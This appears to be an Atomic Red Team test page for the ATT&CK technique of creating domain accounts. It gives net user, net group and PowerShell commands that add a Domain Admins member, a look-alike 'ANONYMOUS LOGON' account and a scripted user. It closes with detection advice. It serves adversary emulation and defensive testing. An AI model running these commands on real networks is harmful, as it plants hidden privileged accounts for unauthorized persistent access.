# T1136.002 - Create Account: Domain Account
Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the <code>net user /add /domain</code> command can be used to create a domain account.

Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

## Atomic Tests

### Atomic Test #1 - Create a new Windows domain admin user
Creates a new domain admin user in a command prompt.

**Supported Platforms:** windows
#### Attack Commands: Run with `command_prompt`
```command_prompt
net user "T1136.002_Admin" "T1136_pass123!" /add /domain
net group "Domain Admins" "T1136.002_Admin" /add /domain
```

In [ ]:
Invoke-AtomicTest T1136.002 -TestNumbers 1

### Atomic Test #2 - Create a new account similar to ANONYMOUS LOGON
Create a new account similar to ANONYMOUS LOGON in a command prompt.

**Supported Platforms:** windows
#### Attack Commands: Run with `command_prompt`
```command_prompt
net user "ANONYMOUS  LOGON" "T1136_pass123!" /add /domain
```

In [ ]:
Invoke-AtomicTest T1136.002 -TestNumbers 2

### Atomic Test #3 - Create a new Domain Account using PowerShell
Creates a new Domain User using the credentials of the Current User

**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
$SamAccountName = 'T1136.002_Admin'
$AccountPassword = ConvertTo-SecureString 'T1136_pass123!' -AsPlainText -Force
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
$Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain)
$User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context)
$User.SamAccountName = $SamAccountName
$TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword)
$User.SetPassword($TempCred.GetNetworkCredential().Password)
$User.Enabled = $True
$User.PasswordNotRequired = $False
$User.DisplayName = $SamAccountName
$User.Save()
$User
```

In [ ]:
Invoke-AtomicTest T1136.002 -TestNumbers 3

## Detection
Monitor for processes and command-line parameters associated with domain account creation, such as <code>net user /add /domain</code>. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain accounts to detect suspicious accounts that may have been created by an adversary.